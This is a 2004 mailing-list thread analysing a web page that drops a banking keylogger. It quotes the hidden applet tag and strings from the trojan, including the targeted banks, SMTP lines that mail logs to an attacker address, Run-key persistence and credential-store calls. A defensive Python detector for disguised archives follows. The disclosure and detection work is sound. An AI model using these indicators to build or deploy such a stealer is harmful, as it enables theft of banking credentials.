From: aditya.deshmukh at online.gateway.technolabs.net (Aditya, ALD [Aditya Lalit Deshmukh])
Subject: Re: http://federalpolice.com:article872@...5686747

This is a keylogger that will mail out your interesting logs to some Russian address!
So beware of this one.

But what I couldn't understand is how is this file executed?

-aditya

> -----Original Message-----
> From: full-disclosure-admin@...ts.netsys.com
> [mailto:full-disclosure-admin@...ts.netsys.com]On Behalf Of
> n.teusink@...net.nl
> Sent: Sunday, February 15, 2004 11:40 PM
> To: full-disclosure@...ts.netsys.com
> Subject: [Full-Disclosure] Re:
> http://federalpolice.com:article872@...5686747
> 
> 
> From the source of that page:
> 
> <APPLET ARCHIVE="javautil.zip" CODE="BlackBox.class" WIDTH=1 HEIGHT=1>
> 
> BlackBox.class is detected immediately by my virus scanner as
> ClassLoader/E, more info:
> http://www.viruslibrary.com/virusinfo/Trojan.Java.ClassLoader.htm
> 
> The javautil.zip appears to be an exe file renamed to zip. The
> exe is compressed with FSG.
> 
> Interesting pieces of output from strings on the decompressed exe:
> 
> 
> ----------------------------------------------BEGIN
> HookerDll.Dll
> Install
> Uninstall
> EDIT
> %s\%s
> WVS3
> 	\kgn.txt
> Hooker.dll
> Install
> Uninstall
> Westpac
> bendigo
> Bendigo
> e-bendigo
> e-Bendigo
> commbank
> Commonwealth
> NetBank
> Citibank
> Bank of America
> e-gold
> e-bullion
> e-Bullion
> evocash
> EVOCash
> EVOcash
> intgold
> INTGold
> paypal
> PayPal
> bankwest
> Bank West
> BankWest
> National Internet Banking
> cibc
> CIBC
> scotiabank
> ScotiaBank
> Scotia Bank
> bank of montreal
> Bank of Montreal
> royalbank
> Royal Bank
> RoyalBank
> tdwaterhouse
> TD Canada Trust
> TD Waterhouse
> president's choice
> President's Choice
> President Choice
> suncorpmetway
> Suncorp
> macquarie
> Macquarie
> INTgold
> 1mdc
> 1MDC
> TD Waterhouse
> goldmoney
> GoldMoney
> goldgrams
> pecunix
> Pecunix
> Pecun!x
> hyperwallet
> HyperWallet
> Wells Fargo
> Bank One
> Banesto
> CAIXA
> SunTrust
> Sun Trust
> Discover Card
> Washington Mutual
> Wachovia
> desjardins
> Chase
> 0+060F0
> 1$11161J1U1i1
> 2.2I2\2
> 3'3,3E3c3h3r3
> 4%42484>4D4J4P4V4\4b4h4n4t4z4
> DATA
> EHLO localhost
> Subject: KeyLog from (%s)
> MAIL FROM:<pentasatan@...l.ru>
> RCPT TO:<pentasatan@...l.ru>
> SOFTWARE\Microsoft\Windows\CurrentVersion\Run
> open
> pstorec.dll
> PStoreCreateInstance
> internet explorer
> http://
> wininetcachecredentials
> Cookie:
> ----------------------------------------------END
> 
> I think you can draw your own conclusions about this file.
> 
> Niels
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 


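The two indicators Niels points at above, a 1x1 APPLET tag in the page source and an ARCHIVE that is really a Windows executable rather than a ZIP, as an added detection example in Python (not code from this thread). The HTML snippet and the archive bytes are constructed samples modelled on the quoted tag.

```python
# Added example: flag hidden applets in page source and check whether the
# archive they reference is a PE executable (MZ) instead of a ZIP (PK).
import re
from typing import List, Tuple

APPLET_RE = re.compile(r"<applet\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r'(\w+)\s*=\s*"?([^"\s>]+)"?')


def find_hidden_applets(html: str, max_px: int = 1) -> List[dict]:
    """Return the attributes of every APPLET whose WIDTH and HEIGHT are both <= max_px."""
    hits = []
    for m in APPLET_RE.finditer(html):
        attrs = {k.upper(): v for k, v in ATTR_RE.findall(m.group(1))}
        try:
            w, h = int(attrs.get("WIDTH", 0)), int(attrs.get("HEIGHT", 0))
        except ValueError:
            continue  # non-numeric size: not the 1x1 pattern we are looking for
        if w <= max_px and h <= max_px:
            hits.append(attrs)
    return hits


def classify_archive(data: bytes) -> str:
    """Classify by magic bytes: 'pe' for an MZ executable, 'zip' for PK, else 'unknown'."""
    if data[:2] == b"MZ":
        return "pe"
    if data[:2] == b"PK":
        return "zip"
    return "unknown"


def audit(html: str, archives: dict) -> List[Tuple[str, str]]:
    """Pair each hidden applet's ARCHIVE name with the real type of the bytes served for it."""
    findings = []
    for a in find_hidden_applets(html):
        name = a.get("ARCHIVE", "")
        findings.append((name, classify_archive(archives.get(name, b""))))
    return findings


# Constructed sample input modelled on the tag quoted in the thread.
SAMPLE_HTML = ('<html><body><APPLET ARCHIVE="javautil.zip" CODE="BlackBox.class" '
               'WIDTH=1 HEIGHT=1></APPLET></body></html>')
# Constructed: a DOS/PE header where a ZIP (PK) would be expected.
SAMPLE_ARCHIVES = {"javautil.zip": b"MZ\x90\x00" + b"\x00" * 60}

if __name__ == "__main__":
    for name, kind in audit(SAMPLE_HTML, SAMPLE_ARCHIVES):
        print(f"hidden applet archive {name!r}: bytes are {kind}")
```

A mismatch between the archive's extension and its magic bytes is the point worth alerting on; a legitimate 1x1 applet is rare but possible, so treat size alone as a weaker signal.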